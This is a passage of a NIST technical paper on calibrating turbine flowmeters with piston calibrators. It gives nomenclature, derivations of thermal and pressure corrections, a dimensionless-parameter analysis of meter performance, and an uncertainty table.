*A*~C0~, *A*~C~ Calibrator cross-sectional areas at reference and non-reference conditions, respectively. Over-bars, where used, denote averages over piston stroke length. L^2^
*A*~t0~, *A*~t~ Cross-sectional areas of tubes connected to calibrator piston at reference and non-reference conditions, respectively. L^2^
*C*~0~, *C* Circumference of cylindrical body in unstressed and stressed conditions, respectively. L
*d*~0~, *d* Diameter of rod connected to calibrator piston at reference and non-reference conditions, respectively. L
*D*~0~, *D* Inner diameter of calibrator cylinder at reference and non-reference conditions, respectively. L
*D*~M0~, *D*~M~ Inside diameter of flowmeter at reference and non-reference conditions, respectively. L
*d*~M0~, *d*~M~ Outside diameter of turbine propeller at reference and non-reference conditions, respectively. L
*D*~C0~, *D*~C~ Inside diameter of the cylinder of the calibrator at reference and non-reference conditions, respectively. L
*D*~T0~, *D*~T~ Outside diameter of the tube connected to the calibrator piston at reference and non-reference conditions, respectively. L
*E*~C~ Modulus of elasticity of the material of the calibrator cylinder at pertinent conditions. F/L^2^
*E*~F~ Modulus of elasticity of the fluid at pertinent conditions. F/L^2^
*E*~M~ Modulus of elasticity of the material of the body of the flowmeter at pertinent conditions. F/L^2^
*E*~T~ Modulus of elasticity of the material of the tube connected to the calibrator piston at pertinent conditions. F/L^2^
*f*~E0~, *f*~E~ Frequency of pulses from encoder at reference and non-reference conditions, respectively. pulses/t
*f*~M0~, *f*~M~ Frequencies of pulses from the flowmeter at reference and non-reference conditions respectively. pulses/t
*K*~E0~, *K*~E~ Encoder constant at reference and non-reference conditions, respectively. pulses/L
*K*~C0~, *K*~C~ Calibrator constant at reference and non-reference conditions, respectively. pulses/L^3^
*K*~Ć~ Calibrator constant in pulses per fluid volume collected in collection vessel. pulses/L^3^
*K*~M0~, *K*~M~ Meter factor at reference and non-reference conditions, respectively. Where over-bars are used is meant the average value over a Reynolds number range. pulses/L^3^
*L*~E0~, *L*~E~ Piston stroke length at reference and non-reference conditions, respectively. L
*N*~E0~, *N*~E~ Totalized encoder pulses at reference and non-reference conditions, respectively. pulses
*N*~M0~, *N*~M~ Totalized meter pulses at reference and non-reference conditions, respectively. pulses
***n*** Unit vector. dimensionless
*P*~C0~, *P*~C~ Pressure of the fluid in the cylinder of the calibrator at reference and non-reference conditions, respectively. F/L^2^
*P*~COLL'T~ Pressure of fluid in collection vessel. F/L^2^
*P*~C0~, *P*~C~ Pressure of the fluid in the flowmeter at reference and non-reference conditions, respectively. F/L^2^
*Re* Reynolds number. dimensionless
*Ro* Roshko number. dimensionless
*St* Strouhal number. Where over-bars are used is meant the average value over a Reynolds number range. dimensionless
*S* Surface area of control volume. L^2^
*T*~r~ Temperature of meter rotor or of rod connected to calibrator piston. °C (°F)
*T*~C0~, *T*~C~ Temperature of the cylinder of the calibrator at reference and non-reference conditions, respectively. °C (°F)
*T*~E0~, *T*~E~ Temperature of the encoder at reference and non-reference conditions, respectively. °C (°F)
*t*~C0~ Thickness of the cylinder of the calibrator at reference conditions. L
*t*~T0~ Thickness of the tube connected to the to the calibrator piston at reference conditions. L
*t* Time. t
*T*~COLL'T~ Temperature of fluid in collection vessel. °C (°F)
*T*~M0~, *T*~M~ Temperature of the flowmeter at reference and non-reference conditions, respectively. °C(°F)
*t*~M0~ Thickness of the body of the flowmeter at reference conditions. L
*U*~M0~ Average velocity of fluid through the flowmeter at reference conditions. L/t
*V*~C0~, *V*~C~ Calibrator piston displacement at reference and non-reference conditions, respectively. L^3^
***v*** Fluid velocity vector. L/t
*V* Control volume. L^3^
${\overset{˙}{V}}_{C0}$, *V*~C0~ Fluid volumetric flowrate and volume, respectively, in the calibrator cylinder at reference condition. L^3^/t,L^3^
${\overset{˙}{V}}_{{COLL}^{’}T0}$, *V*~COLL'TO~ Fluid volumetric flowrate and volume, respectively, into collection vessel at reference conditions. L^3^/t,L^3^
${\overset{˙}{V}}_{C}$, *V*~C~ Fluid volumetric flowrate and volume, respectively, in the calibrator cylinder at non-reference conditions. L^3^/t,L^3^
${\overset{˙}{V}}_{M0}$, *V*~M0~ Fluid volumetric flowrate and volume, respectively, in flowmeter at reference conditions. L^3^/t,L^3^
${\overset{˙}{V}}_{M}$, *V*~M~ Fluid volumetric flowrate and volume, respectively, through the flowmeter at non-reference conditions. L^3^/t,L^3^
*α*~E~ Linear expansion coef-of the encoder at pertinent conditions. °C^−1^(°F^−1^)
*α*~C~ Linear expansion coefficient for the material of the calibrator cylinder at pertinent conditions. °C^−1^(°F^−1^)
*α*~F~ Linear expansion coefficient of fluid. °C^−1^ (°F^−1^)
*α*~M~ Linear expansion coefficient for the material of the body of the flowmeter. °C^−1^ (°F^−1^)
*α*~r~ Linear expansion coefficient for the material of rotor or turbine wheel. °C^−1^ (°F^−1^)
*β* Ratio of turbine propeller diameter to inside diameter of meter. dimensionless
ϵ~θ~ Hoop strain in cylindrical body. dimensionless
*ρ* Fluid density. M/L^3^
*ρ*~C0~, *ρ*~C~ Fluid density in calibrator at reference and non-reference conditions, espectively. M/L^3^
*ρ*~COLL'T0,~ *ρ*~COLL'T~ Density of fluid collected in collection vessel at reference and non-reference conditions, espectively. M/L^3^
*ρ*~M0~, *ρ*~M~ Density of the fluid in the flowmeter at reference and non-reference conditions, respectively. M/L^3^
σ~θ~ Hoop stress in cylindrical body. F/L^2^
ν~0~, *v* Fluid kinematic viscosity at reference and non-reference conditions, espectively. L^2^/t
*μ*~0~, *μ* Fluid absolute viscosity at reference and non-reference conditions, espectively. Ft/L^2^
The fluid pressure and temperature inside the cylinder of the calibrator can enlarge or reduce the cross-sectional areas of this cylinder, see [Fig. 1](#f1-jresv97n5p509_a1b){ref-type="fig"}. As well, geometrical changes of the rod or tube connected to the piston can also contribute to changes in this cross-sectional area. Of course, knowledge of specific geometries and material properties are crucial to characterizing these changes. In the following it is assumed that a generic cylinder and rod geometry exist as sketched in [Fig. 1](#f1-jresv97n5p509_a1b){ref-type="fig"}.
First, thermal expansion will increase the diameters of the cylinder and the connecting tube or rod via the first order approximations $$D = D_{0}\lbrack 1 + \alpha_{C}(T_{C} - T_{0}\rbrack$$and $$d = d_{0}\lbrack 1 + \alpha_{r}(T_{r} - T_{0}\rbrack,$$where, in compatible units, *D* and *d* and *D*~0~ and *d*~0~ are the cylinder and tube diameters at non-reference and reference conditions, respectively. The linear expansion coefficients for cylinder and tube or rod are *α*~C~ and *α*~r~, respectively, and *T*~C~ and *T*~r~ are the corresponding temperatures. These diametral enlargements will produce an increased cross-sectional area via the first order approximation $${\overline{A}}_{C} = {\overline{A}}_{C0}\lbrack 1 + 2\alpha_{C}(T_{C} - T_{0}\rbrack,$$where *Ā*~C~ and *Ā*~C0~ are, respectively, the annular areas between cylinder and rod as averaged over the appropriate piston displacement. The linear expansion coefficient of the rod or tube is assumed to be the same as that for the cylinder.
Second, pressure effects can change the cross-sectional area through the enlargement of the calibrator cylinder and the contraction of the rod or tube connected to the piston. The azimuthal or "hoop" stress, *σ~β~*, produced in the calibrator cylinder can be shown to be $$\sigma_{\theta} = (P_{C} - P_{0})D_{C}/2t_{C},$$where *P*~C~--*P*~0~ is the pressure difference between the pressure in the cylinder and the reference pressure outside the cylinder. The quantities *D*~C~ and *t*~C~ are, respectively, the inside diameter and the thickness of the cylinder. The azimuthal strain produced by this stress is assumed to be $$\in_{\theta} = \sigma_{\theta}/E_{C},$$where transverse effects are neglected and where *E*~C~ is the modulus of elasticity of the material of the calibrator. This azimuthal strain increases the circumference of the calibrator cylinder via $$C = C_{0}(1 + \in_{\theta}),$$where *C* and *C*~0~ are, respectively, the inside circumferences of the cylinder in stressed and unstressed conditions. This produces an increase, to first order, in the cylinder's averaged cross-sectional area of $${\overline{A}}_{C} = \frac{{\overline{C}}^{2}}{4\pi} = \frac{{{\overline{C}}_{0}}^{2}}{4\pi}\left\lbrack {1 + \frac{(P_{C} - P_{0})D_{C0}}{t_{C0}E_{C}}} \right\rbrack$$or since ${\overline{A}}_{C0} = {{\overline{C}}_{0}}^{2}/4\pi,$ $${\overline{A}}_{C} = {\overline{A}}_{C0}\left\lbrack {1 + \frac{(P_{C} - P_{0})D_{C0}}{t_{C0}E_{C}}} \right\rbrack,$$where *D*~C0~ and *t*~C0~ are the diameter and thickness, respectively, of the calibrator cylinder at reference conditions. Typical values for the ratio *D*~C0~/*t*~C0~could be 10 to 20.
In similar fashion, the cylinder pressure in excess of the reference pressure, *P*~0~ at which condition the reference dimensions are determined can reduce the outside diameter of the tube connected to the piston. Since the deformation of a tube should, for the same material and diameter, exceed that for a solid rod, it shall be considered here. Therefore, the cross-sectional area of the tube connected to the piston would be $${\overline{A}}_{t} = {\overline{A}}_{t0}\left\lbrack {1 - \frac{(P_{C} - P_{0})D_{t0}}{t_{t0}E_{t}}} \right\rbrack,$$where *D*~t0~ and *t*~t0~ are, respectively, the outside diameter and the thickness of the wall of the tube connected to the piston at reference conditions. The quantity *E*~T~ is the modulus of elasticity of the tube material, at reference conditions.
It is generally and safely assumed that the tube contraction effect expressed in [Eq. (A.1.9)](#fd74-jresv97n5p509_A1b){ref-type="disp-formula"} is negligible in comparison to the effects of temperature on the inner diameter of the calibrator. Therefore, it is assumed that the annular cross-sectional area between cylinder and tube is that expressed in [Eq. (A.1.3)](#fd68-jresv97n5p509_A1b){ref-type="disp-formula"} and the effect of pressure on this annular area is expressed in [Eq. (A.1.8)](#fd73-jresv97n5p509_A1b){ref-type="disp-formula"}. However, where specifics indicate that other compensations need to be made, other approximations can and should be done. The combined effect of pressure and temperature on the averaged cross-sectional area of the cylinder of the calibrator is, $${\overline{A}}_{C} = {\overline{A}}_{C0}\lbrack 1 + 2\alpha_{C}(T_{C} - T_{C0}\rbrack\left\lbrack {1 + \frac{(P_{C} - P_{0})D_{C0}}{E_{C}t_{C0}}} \right\rbrack.$$
Conventional practice in processing and using turbine-type flowmeter data began with plotting the meter *K* factor in pulses per volume units as a function of meter frequency, *f*; see [Fig. A.2.1](#fA1-jresv97n5p509_a1b){ref-type="fig"} and \[[@b5-jresv97n5p509_a1b]--[@b8-jresv97n5p509_a1b]\]. In this figure, the bracketed dots are intended to represent the mean values and the scatter obtained for the *K* factors at respective frequencies. For fluid and flow conditions which precisely duplicate those for which the meter calibration was performed, this practice produced acceptable results. However, when fluid or flow conditions deviated from those of the calibration, it was found that results could be unacceptable. An example is indicated in [Fig. A.2.1](#fA1-jresv97n5p509_a1b){ref-type="fig"}. The lines for which the liquid viscosities are *μ*~1~ and *μ*~2~, respectively, indicate that different meter performance occurs at low flowrates when the fluid dynamic viscosity, *μ*~2~ is greater than the value *μ*~1~ used for the calibration.
{#fA1-jresv97n5p509_a1b}
Flowmeter performance which deviates from that of the calibration conditions at low flowrates is explained by citing the deviant phenomena which have, because of the different fluid or flow conditions, become significant in comparison to the phenomena which prevailed during calibration. Shafer and Lee have resolved several situations involving viscous effects in specific flowmeter geometries \[[@b6-jresv97n5p509_a1b],[@b8-jresv97n5p509_a1b]\]. From such efforts have come Universal Viscosity Curves (UVC) i.e., plots of meter factor versus the ratio of meter frequency to fluid kinematic viscosity. A typical UVC is shown in [Fig. A.2.2](#fA2-jresv97n5p509_a1b){ref-type="fig"}. The ordinate, *K*~0~, is the meter factor referenced to a selected reference temperature via, see \[[@b10-jresv97n5p509_a1b]\], $$K_{0} = K\lbrack 1 + 3\alpha_{M}(T - T_{0}\rbrack.$$
{#fA2-jresv97n5p509_a1b}
Deviations of flowmeter performance characteristics from UVC's can be explained by citing further deviants, such as lubricity, cavitation, extreme temperature or pressure effects on fluid properties, etc., see \[[@b5-jresv97n5p509_a1b]--[@b8-jresv97n5p509_a1b]\].
When the turbine meter is to be used in temperature conditions different from those of the reference or calibration conditions, temperature effects may be compensated for by producing corrections for the meter factor *K*, as found in some standards, see \[[@b10-jresv97n5p509_a1b]\]. This ISA standard produces an underived correction that is based upon the thermal expansion for the material of the meter body. This correction is effective in predicting trends for the case where the meter body and the turbine wheel material are the same. Where these materials are different, this correction can give erroneous results, for example, in the extreme situation where the turbine wheel has expanded to touch the inner wall of the meter body, thus stopping the wheel's rotation. In such a situation the meter factor should be zero yet the ISA correction would not give this result. Therefore, further evolution is needed for conventional turbine-type flowmeter practice---beyond the UVC methods.
Turbine meter performance is most properly characterized by specifying and quantifying, over the pertinent ranges of fluid and flow conditions, the significant dimensionless parameters which influence meter performance. To do this, the dimensional quantities that are involved in turbine-type flowmetering are cited as shown in [Fig. A.2.3](#fA3-jresv97n5p509_a1b){ref-type="fig"}. These five dimensional quantities---fluid density *ρ*, and viscosity *μ*, the flow velocity *U*, the meter frequency *f*, and the meter diameter, *D* are described in terms of three independent units --- length, time, and mass or force. Consequently, there are two dimensionless parameters to characterize the performance of this meter. These dimensionless parameters can take many forms. Conventional fluid mechanical practice would produce parameters expressing ratios of meter frequency effects to fluid inertial effects, i.e., the Strouhal number and the fluid inertial to viscous effects, i.e., the Reynolds number. These are written $$St = fD/U$$and $$Re = \frac{DU_{\rho}}{\mu} = \frac{DU}{\upsilon}.$$
{#fA3-jresv97n5p509_a1b}
However, turbine meters are designed to have frequencies proportional to volumetric flowrates. The constant of proportionality is the reciprocal of the meter factor. Since the constancy of this meter factor, i.e., the linearity of the meter over the flowrate (frequency) range is generally taken to be a measure of the quality of the meter, it has become conventional turbine meter practice to characterize meters via their *K* factor versus frequency dependence. In non-dimensional format, this can be done by specifying meter performance using a Strouhal number that is dependent upon the product of the Strouhal and Reynolds numbers, i.e., *fD*^2^/*v.* This parameterization is essentially that known as the UVC except for the factors involving the meter diameter, *D*, raised to an exponent. This product has been referred to as the Roshko number, *Ro*, $$Ro = \frac{fD^{2}}{\upsilon}$$see \[[@b9-jresv97n5p509_a1b]\]. Alternatively, the pair of parameters, *St* and *Re* could also be used to characterize the meter's performance. In either case, only two parameters are needed to characterize the system sketched in [Fig. A.2.3](#fA3-jresv97n5p509_a1b){ref-type="fig"}.
In all of the above, the effect of different meter geometries or a different turbine wheel is not considered. This is proper where the meter geometry is not changed and where the same turbine wheel and bearings, etc. are used and where the turbine wheel and the meter body are made of the same material. Under these circumstances, the above parameterization of the five dimensional quantities *ρ,μ,U,D*, and *f* is completed with the formulation of the Strouhal and Reynolds or Roshko numbers. Using this formulation the performance of the calibrated meter should enable the meter to be satisfactorily used over a range of conditions similar to those encountered in the calibration.
If the situation is changed as shown in [Fig. A.2.4](#fA4-jresv97n5p509_a1b){ref-type="fig"} so that the turbine wheel diameter, *d*, is included to produce six dimensional quantities, then three dimensionless parameters should be formed. The turbine wheels that are considered here are geometrically scaled versions of each other, i.e., they have the same number of blades, the same blade shape and only differ in the diameter, *d.* The nondimensionalization can be achieved by choosing the third dimensionless parameter to be *β=d/D*, the ratio of turbine wheel to inside pipe diameter. The three parameter performance is sketched in [Fig. A.2.5](#fA5-jresv97n5p509_a1b){ref-type="fig"}. It is noted that when the turbine wheel and meter body are the same material and when only thermal expansion effects are considered, *β* remains constant with changes in temperature, i.e., $$\beta = \frac{d}{D} = \frac{d_{0}\lbrack 1 + \alpha_{r}(T_{r} - T_{0}\rbrack}{D_{0}\lbrack 1 + \alpha_{M}(T_{M} - T_{0}\rbrack},$$when *T*~r~ = *T*~M~ and *α*~r~ *= α*~M~ this diameter ratio is *d*~0~/*D*~0~.
When turbine wheel and meter body are different materials and when *α*~r~*\>α*~M~, the beta ratio is not constant and a condition for the linear expansion coefficients and the fluid flowrate can be derived for which *T*~M~ *= T*~r~, and *β* = 1. This would indicate that the turbine blade tips touch the inside of the meter body thus stopping the wheel. This condition is, of course, contrived in order to illustrate the point that *β* variation can produce meter performance variation and in extreme limits can radically alter the graphs of meter performance.
{#fA4-jresv97n5p509_a1b}
{#fA5-jresv97n5p509_a1b}
If pressure effects are not negligible in altering the diameter of the meter body but are negligible in affecting the diameter of the turbine wheel, *β* is altered, to first order in temperature and pressure, separately, via $$\beta = \frac{d_{0}\lbrack 1 + \alpha_{r}(T_{r} - T_{0})\rbrack}{D_{0}\lbrack 1 + \alpha_{M}(T_{M} - T_{0})\left\lbrack {1 + \frac{(P_{M} - P_{0})D_{M0}}{2t_{M0}E_{M}}} \right\rbrack}.$$By so incorporating thermal and pressure effects using *St*, *Re* or *Ro*, and *β* parameters into performance curves as sketched in [Fig. A.2.6](#fA6-jresv97n5p509_a1b){ref-type="fig"}, widely varying metering conditions should be successfully handled.
{#fA6-jresv97n5p509_a1b}
It is concluded that turbine-type flowmeter performance should be handled non-dimensionally. Pertinent corrections are then most clearly seen and most easily performed using the appropriate, first-order, relationships for the thermal and pressure effects. In this way high levels of flowmeter performance can be expected and achieved.
The equations in [Appendix C](#app3-jresv97n5p509_A1b){ref-type="app"} are numbered as in the main text. *Calibrator Characterization:* Geometrical Measurement Method---Reference Conditions (see p. 513) $$K_{C0} = \frac{N_{E0}}{V_{C0}} = \frac{L_{E0}K_{E0}}{{\overline{A}}_{C0}L_{E0}} = \frac{K_{E0}}{{\overline{A}}_{C0}}.$$Geometrical Measurement Method--Non-Reference Conditions (see p. 515) $$K_{C0} = K_{C}\frac{\lbrack 1 + \alpha_{E}(T_{E} - T_{0})\rbrack}{\lbrack 1 - 2\alpha_{C}(T_{C} - T_{0}\rbrack\left\lbrack {1 - \frac{(P_{C} - P_{0})D_{C0}}{t_{C0}E_{C}}} \right\rbrack},$$where $$K_{C} = \frac{N_{E}}{V_{C}},$$Draw Technique--Reference Conditions (see p. 516) $$K_{C0} = N_{E0}/V_{{COLL}^{’}T0}.$$Draw Technique--Non-Reference Conditions (see p. 517) $$\begin{array}{l}
{K_{C0} = K_{C}^{\prime}} \\
\frac{\lbrack 1 + 2\alpha_{C}(T_{C} - T_{0})\rbrack\left\lbrack {1 + \frac{(P_{C} - P_{0})D_{C0}}{t_{C0}E_{C}}} \right\rbrack}{\lbrack 1 - 3\alpha_{F}(T_{{COLL}^{’}T} - T_{C})\rbrack\left\lbrack {1 + \frac{P_{{COLL}^{’}T} - P_{C}}{E_{F}}} \right\rbrack\lbrack 1 - \alpha_{E}(T_{E} - T_{0})\rbrack} \\
\end{array}$$where $$K_{C}^{\prime} = N_{E}/V_{{COLL}^{’}T}.$$*Meter Calibration:* *Reference Conditions:* (see p. 519) $$K_{M0} = \frac{f_{M0}}{f_{E0}}\ \frac{K_{E0}}{{\overline{A}}_{C0}} = \frac{N_{M0}}{N_{E0}}\ \frac{K_{E0}}{{\overline{A}}_{C0}} = \frac{N_{M0}}{N_{E0}} \bullet K_{C0} = \frac{f_{M0}}{f_{E0}} \bullet K_{C0}.$$*Data Processing*: (see p. 519) $$St = \frac{f_{M0}D_{M0}}{U_{M0}} = C_{1}K_{M0}D_{M0}^{3} \propto K_{M0}D_{M0}^{3},$$ $$Re = \frac{D_{M0}U_{M0}}{\upsilon_{0}},$$ $$R_{0} = \frac{f_{M0}D_{M0}^{2}}{\upsilon_{0}}.$$*Non-Reference Conditions:* (see p. 521) $$\begin{array}{l}
{K_{M} = \frac{f_{M}}{f_{E}}K_{C}\frac{\rho_{M}}{\rho_{C}} = \frac{N_{M}}{N_{E}}K_{C0}} \\
{\times \frac{\lbrack 1 - \alpha_{E}(T_{E} - T_{0})\rbrack\lbrack 1 + 3\alpha_{F}(T_{C} - T_{M})\rbrack}{\lbrack 1 + 2\alpha_{C}(T_{C} - T_{0})\rbrack\left\lbrack {1 + \frac{(P_{C} - P_{0})D_{C0}}{t_{C0}E_{C}}} \right\rbrack\left\lbrack {1 + \frac{(P_{C} - P_{M})}{E_{F}}} \right\rbrack.}} \\
\end{array}$$*Data Processing:* (see p. 522) $$St = f_{M}D_{M}/U_{M} = C_{1}K_{M}D_{M}^{3},$$ $$Re = D_{M}U_{M}/\upsilon,$$ $$Ro = \frac{f_{M}D_{M}^{2}}{\upsilon}.$$*Flow Measurement:* *Reference Conditions:* (see p. 522) $${\overset{˙}{V}}_{M0} = \frac{f_{M0}}{{\overline{K}}_{M0}} = \frac{C_{1}D_{M0}^{3}f_{M0}}{\overline{St}}.$$*Non-Reference Conditions:* (see p. 523) $${\overset{˙}{V}}_{M} = \frac{f_{M}}{{\overline{K}}_{M}} = \frac{C_{1}f_{M}D_{M}^{3}}{\overline{St}},$$ $${\overset{˙}{V}}_{M0} = \frac{C_{1}f_{M}D_{M0}^{3}}{St}{(\frac{\mu_{M0}}{\mu_{M}})}\frac{\lbrack 1 + 2\alpha_{M}(T_{M} - T_{M0})\rbrack\left\lbrack {1 + \frac{(P_{M} - P_{M0})D_{M0}}{t_{M0}E_{M}}} \right\rbrack}{\lbrack 1 + 3\alpha_{F}(T_{M} - T_{M0})\rbrack\left\lbrack {1 - \frac{(P_{M} - P_{M0})}{E_{F}}} \right\rbrack}.$$
**About the author:** Dr. George E. Mattingly is a mechanical engineer who leads the Fluid Flow Group in the Process Measurements Division of the NIST Chemical Science and Technology Laboratory. The National Institute of Standards and Technology is an agency of the Technology Administration, U.S. Department of Commerce.
{#f1-jresv97n5p509_a1b}
{#f2-jresv97n5p509_a1b}
{#f3-jresv97n5p509_a1b}
{#f4-jresv97n5p509_a1b}
{#f5-jresv97n5p509_a1b}
{#f6-jresv97n5p509_a1b}
{#f7-jresv97n5p509_a1b}
{#f8-jresv97n5p509_a1b}
{#f9-jresv97n5p509_a1b}
######
Temperature and pressure effects
Factor affected Total diff (°C) Temperature effects Total temperature combined worst case Press diff (atm) Pressure effects Total pressure combined worst case Total worst case
-------------------------------------------------------------------------- ----------------- --------------------- --------------------------------------- ------------------ ------------------ ------------------------------------ ------------------ --------- --------- --------- --------- ---------
*K*~C0:GEOM~[a](#tfn1-jresv97n5p509_a1b){ref-type="table-fn"} ±1 ±0.001% ±0.004% ±0.005% ±1 ±0.001% ±0.001% ±0.006%
*K*~C0:DRAW~[b](#tfn2-jresv97n5p509_a1b){ref-type="table-fn"} ±1 ±0.001% ±0.004% ±0.090% ±0.095% ±1 ±0.001% ±0.005% ±0.006% ±0.101%
*K*~M0~[c](#tfn3-jresv97n5p509_a1b){ref-type="table-fn"} ±1 ±0.001% ±0.004% ±0.090% ±0.095% ±1 ±0.001% ±0.005% ±0.006% ±0.101%
*St*[d](#tfn4-jresv97n5p509_a1b){ref-type="table-fn"} ±1 ±0.001% ±0.004% ±0.090% ±0.006% ±0.101% ±1 ±0.001% ±0.005% ±0.001% ±0.007% ±0.108%
*K*~M~[e](#tfn5-jresv97n5p509_a1b){ref-type="table-fn"} ±1 ±0.002% ±0.008% ±0.180% ±0.190% ±1 ±0.002% ±0.010% ±0.012% ±0.202%
*St*[f](#tfn6-jresv97n5p509_a1b){ref-type="table-fn"} ±1 ±0.002% ±0.008% ±0.180% ±0.006% ±0.196% ±1 ±0.002% ±0.010% ±0.001% ±0.013% ±0.209%
${\overset{*}{V}}_{MU}$[g](#tfn7-jresv97n5p509_a1b){ref-type="table-fn"} ±1 ±0.001% ±0.004% ±0.090% ±0.090% ±1 ±0.001% ±0.005% ±0.006% ±0.101%
${\overset{*}{V}}_{M}$[h](#tfn8-jresv97n5p509_a1b){ref-type="table-fn"} ±1 ±0.002% ±0.008% ±0.180% ±0.190% ±1 ±0.002% ±0.010% ±0.012% ±0.202%
${\overset{*}{V}}_{MU}$[i](#tfn9-jresv97n5p509_a1b){ref-type="table-fn"} ±1 ±0.002% ±0.008% ±0.270% ±0.012% ±0.292% ±1 ±0.002% ±0.015% ±0.002% ±0.019% ±0.311%
Determined via [Eq. (10)](#fd10-jresv97n5p509_A1b){ref-type="disp-formula"} at non-reference conditions.
Determined via [Eq. (29)](#fd29-jresv97n5p509_A1b){ref-type="disp-formula"} at non-reference conditions with no additional uncertainty for the encoder or the collection volume.
Determined using *K*~CU:DRAW~ via [Eq. (42)](#fd42-jresv97n5p509_A1b){ref-type="disp-formula"} with no additional uncertainty resulting from encoder or meter outputs.
Determined using *K*~CU:DRAW~ via [Eq. (43)](#fd43-jresv97n5p509_A1b){ref-type="disp-formula"} in reference conditions.
Determined using *K*~CU:DRAW~ via [Eq. (53)](#fd53-jresv97n5p509_A1b){ref-type="disp-formula"}.
Determined using *K*~CU:DRAW~ via [Eq. (54)](#fd54-jresv97n5p509_A1b){ref-type="disp-formula"}.
Determined using *K*~M0~ via [Eq. (59)](#fd59-jresv97n5p509_A1b){ref-type="disp-formula"} with no additional uncertainty resulting from the meter output.
Determined using *K*~M~ via [Eq. (60)](#fd60-jresv97n5p509_A1b){ref-type="disp-formula"} with no additional uncertainty resulting from meter output.
Determined using [Eq. (65)](#fd65-jresv97n5p509_A1b){ref-type="disp-formula"} with not additional uncertainty for meter output, reference meter dimension, and absolute viscosity.
|
{
"pile_set_name": "PubMed Central"
}
|
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.